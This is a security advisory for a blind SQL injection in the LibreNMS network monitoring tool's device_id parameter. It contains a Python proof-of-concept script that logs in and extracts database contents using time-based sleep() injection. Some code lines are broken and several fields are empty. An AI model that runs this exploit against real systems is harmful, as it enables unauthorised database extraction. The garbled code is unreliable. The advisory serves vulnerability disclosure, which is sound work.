CVE-2020-15873: Blind SQL Injection in Librenms

Blind SQL Injection in Librenms

CVE Number



CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Product Details

LibreNMS is an autodiscovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems including Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP and many more.


Vulnerable Versions


Vulnerability Details

Librenms is vulnerable to blind SQL injection. Due to missing protection for SQL injection on An authenticated attacker can inject malicious SQL queries in device_id POST parameter. Due to this flaw, an attacker can extract complete database information.


Steps To Reproduce :

  • POC
import requests
import sys
from bs4 import BeautifulSoup

s = requests.Session()

def sqli(ip, inj_str):
	for j in range(32, 126):
		target = "http://%s/ajax_form.php" % sys.argv[1]
		p_data = {"action": "test", "type": "customoid", "device_id": inj_str.replace("[CHAR]", str(j))}
		r =, data=p_data)
		if (round(r.elapsed.total_seconds()) > 7):
			return j
	return None

def main():
	ip = sys.argv[1]
	print "(+) Retrieving database version...."
	for i in range(1, 15):
		injection_string ="1 and if(ascii(substring((select version()),%d,1))=[CHAR],sleep(10),'bar')%%23" % i
		extracted_char = chr(sqli(ip, injection_string))
		sys.stdout.write(extracted_char) # displaying data
	print "\n(+) done!"

if __name__ == "__main__":
	if len(sys.argv) != 4:
		print "(+) usage: %s <target> <username> <password>" % sys.argv[0]
		print '(+) eg: %s domain/ip username password' % sys.argv[0]

	login_url = "http://%s/login" % sys.argv[1]
	response = s.get(login_url)
	soup = BeautifulSoup(response.text, 'html.parser')
	_token = soup.find('input')['value'] 
	username = sys.argv[2]
	password = sys.argv[3]
	login_data = {"_token": _token, "username": username, "password": password, "remember": "on", "submit":""}
	login =, data=login_data)
  • prerequisites :
    • Python module : bs4
  • Command : python $ ip/domain username password


An authenticated attacker can extract arbitrary data from database.


Parameterize query should be used.


Discovered by ACE Team – Loginsoft